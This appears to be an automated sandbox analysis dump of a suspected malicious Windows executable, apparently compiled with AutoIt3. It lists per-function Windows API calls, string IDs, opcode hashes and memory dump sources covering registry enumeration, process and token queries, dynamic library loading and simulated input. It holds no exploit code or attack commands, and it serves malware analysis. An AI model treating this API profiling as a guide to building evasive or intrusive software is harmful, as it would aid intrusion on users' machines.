                    • Instruction ID: 4e2f3e676be4570a162f2f395289ef2641b8990b6a5f9e6486c9b93f41dcc474
                    • Opcode Fuzzy Hash: d678a122264c6eab733bcb878069dcb1fcab10b62820034282eac1820081146f
                    • Instruction Fuzzy Hash: 2911B471600208BBDF11BF60DC89FEA3778AF8A701F048175FD09AA152CB795945CB75
                    APIs
                    • CharUpperBuffW.USER32(?,?), ref: 007B2048
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: BuffCharUpper
                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                    • API String ID: 3964851224-769500911
                    • Opcode ID: ec60460ba97184aa47f86de45eb588ad6371133ebd9628150875a7dda1d277bf
                    • Instruction ID: 0343116228eaa503ab50bdffc7941188c15223da21dbb1e6b46bdbaf3444647c
                    • Opcode Fuzzy Hash: ec60460ba97184aa47f86de45eb588ad6371133ebd9628150875a7dda1d277bf
                    • Instruction Fuzzy Hash: E3116D30911209DFCF14EFB8D8515EEB7B4FF19304B208869D856A7292EB36690BCB90
                    APIs
                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 007CEF1B
                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 007CEF4B
                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 007CF07E
                    • CloseHandle.KERNEL32(?), ref: 007CF0FF
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                    • String ID:
                    • API String ID: 2364364464-0
                    • Opcode ID: aa84a6736496e7738b5c197295f7704b26866f73f107a403a9a6451b156225c9
                    • Instruction ID: e3c6ee75f5d375c4a7dcee08c08e510ab171554272754bec093e922c93ce8ef7
                    • Opcode Fuzzy Hash: aa84a6736496e7738b5c197295f7704b26866f73f107a403a9a6451b156225c9
                    • Instruction Fuzzy Hash: 28817371604700DFD720DF28C84AF6AB7E5AF88B10F14881DF996DB292DBB9AD44CB51
                    APIs
                      • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                      • Part of subcall function 007D10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007D0038,?,?), ref: 007D10BC
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007D0388
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007D03C7
                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 007D040E
                    • RegCloseKey.ADVAPI32(?,?), ref: 007D043A
                    • RegCloseKey.ADVAPI32(00000000), ref: 007D0447
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                    • String ID:
                    • API String ID: 3440857362-0
                    APIs
                      • Part of subcall function 00759997: __itow.LIBCMT ref: 007599C2
                      • Part of subcall function 00759997: __swprintf.LIBCMT ref: 00759A0C
                    • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 007CDC3B
                    • GetProcAddress.KERNEL32(00000000,?), ref: 007CDCBE
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 007CDCDA
                    • GetProcAddress.KERNEL32(00000000,?), ref: 007CDD1B
                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 007CDD35
                      • Part of subcall function 00755B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,007B7B20,?,?,00000000), ref: 00755B8C
                      • Part of subcall function 00755B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,007B7B20,?,?,00000000,?,?), ref: 00755BB0
                    Similarity
                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                    • String ID:
                    • API String ID: 327935632-0
                    APIs
                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 007BE88A
                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 007BE8B3
                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 007BE8F2
                      • Part of subcall function 00759997: __itow.LIBCMT ref: 007599C2
                      • Part of subcall function 00759997: __swprintf.LIBCMT ref: 00759A0C
                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 007BE917
                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 007BE91F
                    Similarity
                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                    • String ID:
                    • API String ID: 1389676194-0
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    APIs
                    • GetCursorPos.USER32(?), ref: 00752357
                    • ScreenToClient.USER32(008167B0,?), ref: 00752374
                    • GetAsyncKeyState.USER32(00000001), ref: 00752399
                    • GetAsyncKeyState.USER32(00000002), ref: 007523A7
                    Similarity
                    • API ID: AsyncState$ClientCursorScreen
                    • String ID:
                    • API String ID: 4210589936-0
                    APIs
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007A695D
                    • TranslateAcceleratorW.USER32(?,?,?), ref: 007A69A9
                    • TranslateMessage.USER32(?), ref: 007A69D2
                    • DispatchMessageW.USER32(?), ref: 007A69DC
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007A69EB
                    Similarity
                    • API ID: Message$PeekTranslate$AcceleratorDispatch
                    • String ID:
                    • API String ID: 2108273632-0
                    APIs
                    • GetWindowRect.USER32(?,?), ref: 007A8F12
                    • PostMessageW.USER32(?,00000201,00000001), ref: 007A8FBC
                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 007A8FC4
                    • PostMessageW.USER32(?,00000202,00000000), ref: 007A8FD2
                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 007A8FDA
                    Similarity
                    • API ID: MessagePostSleep$RectWindow
                    • String ID:
                    • API String ID: 3382505437-0
                    APIs
                    • IsWindowVisible.USER32(?), ref: 007AB6C7
                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 007AB6E4
                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 007AB71C
                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 007AB742
                    • _wcsstr.LIBCMT ref: 007AB74C
                    Similarity
                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                    • String ID:
                    • API String ID: 3902887630-0
                    APIs
                      • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                    • GetWindowLongW.USER32(?,000000F0), ref: 007DB44C
                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 007DB471
                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 007DB489
                    • GetSystemMetrics.USER32(00000004), ref: 007DB4B2
                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,007C1184,00000000), ref: 007DB4D0
                    Similarity
                    • API ID: Window$Long$MetricsSystem
                    • String ID:
                    • API String ID: 2294984445-0
                    APIs
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007A9802
                      • Part of subcall function 00757D2C: _memmove.LIBCMT ref: 00757D66
                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 007A9834
                    • __itow.LIBCMT ref: 007A984C
                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 007A9874
                    • __itow.LIBCMT ref: 007A9885
                    Similarity
                    • API ID: MessageSend$__itow$_memmove
                    • String ID:
                    • API String ID: 2983881199-0
                    APIs
                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0075134D
                    • SelectObject.GDI32(?,00000000), ref: 0075135C
                    • BeginPath.GDI32(?), ref: 00751373
                    • SelectObject.GDI32(?,00000000), ref: 0075139C
                    Similarity
                    • API ID: ObjectSelect$BeginCreatePath
                    • String ID:
                    • API String ID: 3225163088-0
                    APIs
                    Similarity
                    • API ID: _memcmp
                    • String ID:
                    • API String ID: 2931989736-0
                    APIs
                    • GetCurrentThreadId.KERNEL32 ref: 007B4D5C
                    • __beginthreadex.LIBCMT ref: 007B4D7A
                    • MessageBoxW.USER32(?,?,?,?), ref: 007B4D8F
                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 007B4DA5
                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 007B4DAC
                    Similarity
                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                    • String ID:
                    • API String ID: 3824534824-0
                    APIs
                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 007A8766
                    • GetLastError.KERNEL32(?,007A822A,?,?,?), ref: 007A8770
                    • GetProcessHeap.KERNEL32(00000008,?,?,007A822A,?,?,?), ref: 007A877F
                    • HeapAlloc.KERNEL32(00000000,?,007A822A,?,?,?), ref: 007A8786
                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 007A879D
                    Similarity
                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                    • String ID:
                    • API String ID: 842720411-0
                    APIs
                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007B5502
                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 007B5510
                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 007B5518
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 007B5522
                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007B555E
                    Similarity
                    • API ID: PerformanceQuery$CounterSleep$Frequency
                    • String ID:
                    • API String ID: 2833360925-0
                    APIs
                    • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A758C,80070057,?,?,?,007A799D), ref: 007A766F
                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A758C,80070057,?,?), ref: 007A768A
                    • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A758C,80070057,?,?), ref: 007A7698
                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A758C,80070057,?), ref: 007A76A8
                    • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A758C,80070057,?,?), ref: 007A76B4
                    Similarity
                    • API ID: From$Prog$FreeStringTasklstrcmpi
                    • String ID:
                    • API String ID: 3897988419-0
                    APIs
                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007A8608
                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007A8612
                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007A8621
                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 007A8628
                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 007A863E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: HeapInformationToken$AllocErrorLastProcess
                    • String ID:
                    • API String ID: 44706859-0
                    • Opcode ID: 968a3fa70a0c6d7553935bf1780dcc1fea44f2c2bd739e6b350f57e7abdf83a6
                    • Instruction ID: 0a0d0d43b3f212de7b95f964db5fc45b5b0400c4b261596f759dd76f3e79a666
                    • Opcode Fuzzy Hash: 968a3fa70a0c6d7553935bf1780dcc1fea44f2c2bd739e6b350f57e7abdf83a6
                    • Instruction Fuzzy Hash: 88F06D31202204AFEB101FA5DD8DE6B3BBCEF8A754B08852AF94AC7151CB799C41DA65
                    APIs
                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 007A8669
                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 007A8673
                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007A8682
                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 007A8689
                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007A869F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: HeapInformationToken$AllocErrorLastProcess
                    • String ID:
                    • API String ID: 44706859-0
                    • Opcode ID: 5d4b9ec31aa8de7e9cceaf0f29e765d6a06d51787b357b5ca3da98e85298f33c
                    • Instruction ID: ab9e400f23ae58839e06bf833facd7e5aab3623e65254a8a0d1bcaf795f24f97
                    • Opcode Fuzzy Hash: 5d4b9ec31aa8de7e9cceaf0f29e765d6a06d51787b357b5ca3da98e85298f33c
                    • Instruction Fuzzy Hash: 1DF0C270201304AFEB111FA4EC88E677BBCEF8A754B144126F946C7151CB79DD00DA61
                    APIs
                    • GetDlgItem.USER32(?,000003E9), ref: 007AC6BA
                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 007AC6D1
                    • MessageBeep.USER32(00000000), ref: 007AC6E9
                    • KillTimer.USER32(?,0000040A), ref: 007AC705
                    • EndDialog.USER32(?,00000001), ref: 007AC71F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                    • String ID:
                    • API String ID: 3741023627-0
                    • Opcode ID: 4e2dd8d5db09acd9e1fbbd28aa094c28e2f48bb2476d983daeef0e1a58973bf8
                    • Instruction ID: 1274398bd774fa6ed33a5c5c30bd02029832c4f829c36b4c1eebc223936782e4
                    • Opcode Fuzzy Hash: 4e2dd8d5db09acd9e1fbbd28aa094c28e2f48bb2476d983daeef0e1a58973bf8
                    • Instruction Fuzzy Hash: 28018630501704ABEB229B20DD4EF9677B8FF01705F04466AF543A14E1DBF8A9548F94
                    APIs
                    • EndPath.GDI32(?), ref: 007513BF
                    • StrokeAndFillPath.GDI32(?,?,0078BAD8,00000000,?), ref: 007513DB
                    • SelectObject.GDI32(?,00000000), ref: 007513EE
                    • DeleteObject.GDI32 ref: 00751401
                    • StrokePath.GDI32(?), ref: 0075141C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Path$ObjectStroke$DeleteFillSelect
                    • String ID:
                    • API String ID: 2625713937-0
                    • Opcode ID: a22053eedcad435fe555f748fadb6bfe91bef5e1a06028ddb46ec11ac837763c
                    • Instruction ID: 7da069c7e559202844fb980221850a0ef5f74407969f5a4d5037bc0a876ad11a
                    • Opcode Fuzzy Hash: a22053eedcad435fe555f748fadb6bfe91bef5e1a06028ddb46ec11ac837763c
                    • Instruction Fuzzy Hash: 95F0C930005248EBDB115F2AEC0C7983BB9BB01327F54C235E8AA894F1D77989A9DF54
                    APIs
                      • Part of subcall function 00770FF6: std::exception::exception.LIBCMT ref: 0077102C
                      • Part of subcall function 00770FF6: __CxxThrowException@8.LIBCMT ref: 00771041
                      • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                      • Part of subcall function 00757BB1: _memmove.LIBCMT ref: 00757C0B
                    • __swprintf.LIBCMT ref: 0076302D
                    Strings
                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00762EC6
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                    • API String ID: 1943609520-557222456
                    • Opcode ID: f9b1733a2e4ca9207cc606670dd9b8ddbd843c288fdc9ebcb0bcc1314b2c57ae
                    • Instruction ID: cee77dc52245df8a951c33cb649eee049c029290c655184a927d4477075a8b0e
                    • Opcode Fuzzy Hash: f9b1733a2e4ca9207cc606670dd9b8ddbd843c288fdc9ebcb0bcc1314b2c57ae
                    • Instruction Fuzzy Hash: 07919071508341DFCB18EF24E999CAEB7A9EF85740F00491DF846972A1DB78EE48CB52
                    APIs
                    • OleSetContainedObject.OLE32(?,00000001), ref: 007AB981
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ContainedObject
                    • String ID: AutoIt3GUI$Container$%~
                    • API String ID: 3565006973-1172083821
                    • Opcode ID: ee2366681e504fbe72f5135cffc9324f27f2068ea9e115cee531b2efdfa6359a
                    • Instruction ID: 424e89e8e5d540f711a4a718263982cc2cb262970c31f9f45cf7e3743f4d5973
                    • Opcode Fuzzy Hash: ee2366681e504fbe72f5135cffc9324f27f2068ea9e115cee531b2efdfa6359a
                    • Instruction Fuzzy Hash: D9914C71600201DFDB64DF68C884A6AB7F9FF89710F14856DF949DB2A2DB74E841CB50
                    APIs
                    • __startOneArgErrorHandling.LIBCMT ref: 007752DD
                      • Part of subcall function 00780340: __87except.LIBCMT ref: 0078037B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ErrorHandling__87except__start
                    • String ID: pow
                    • API String ID: 2905807303-2276729525
                    • Opcode ID: b35c5048295206ad2d3b81c1b182f56155c3c1b146d86e506d7f7283e7dbc9cc
                    • Instruction ID: f1f9bc96f9922446245bde2e2b25d3f8b12b60e944e84e7ca5bcd0d5a4796e94
                    • Opcode Fuzzy Hash: b35c5048295206ad2d3b81c1b182f56155c3c1b146d86e506d7f7283e7dbc9cc
                    • Instruction Fuzzy Hash: 0F517A61A89A41C7DF947724C94137A2B94AB013D0F20CD58E49D866F6EFBC8CD8DBC6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID: #$+
                    • API String ID: 0-2552117581
                    • Opcode ID: 00c6eb9c866c16234d15b2a0a073fa758a6c6be1ff2b1e131b843f3f7d8cee26
                    • Instruction ID: d14933629a63ba150fa1115b3e3bf7fcc42240a7335a2b226ba702bf2970cf3a
                    • Opcode Fuzzy Hash: 00c6eb9c866c16234d15b2a0a073fa758a6c6be1ff2b1e131b843f3f7d8cee26
                    • Instruction Fuzzy Hash: F0512375604646DFCF15DF28C888AFA7BA4EF96310F188155FC959B2A0D73C9C46CBA0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: _memmove$_free
                    • String ID: Oav
                    • API String ID: 2620147621-1091017984
                    • Opcode ID: 657eb094d883e8886e789dcc5d7d176ed6011b2fff132c77068c9b218df0ef32
                    • Instruction ID: 2115092af10062b167c9e9c675ed653636da52c0aff2eabddc21883810e9caf2
                    • Opcode Fuzzy Hash: 657eb094d883e8886e789dcc5d7d176ed6011b2fff132c77068c9b218df0ef32
                    • Instruction Fuzzy Hash: 7B5149716183419FDB28CF28C451B2BBBE1FF85314F44892DE98A87351EB39E901CB92
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: _memset$_memmove
                    • String ID: ERCP
                    • API String ID: 2532777613-1384759551
                    • Opcode ID: b44df5f22380ab85fa0f0700959c9cb70d1591c7c08bd909e0c4ffc9b44535dc
                    • Instruction ID: d4f9b99598b7927dc6facd821c18ca17ae037f58172301a25405bc580ec7a88b
                    • Opcode Fuzzy Hash: b44df5f22380ab85fa0f0700959c9cb70d1591c7c08bd909e0c4ffc9b44535dc
                    • Instruction Fuzzy Hash: 2451C271900359DFDB24CF65C885BAABBF4FF44710F60856EEA4ACB241EB789684CB41
                    APIs
                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,007DF910,00000000,?,?,?,?), ref: 007D7C4E
                    • GetWindowLongW.USER32 ref: 007D7C6B
                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 007D7C7B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
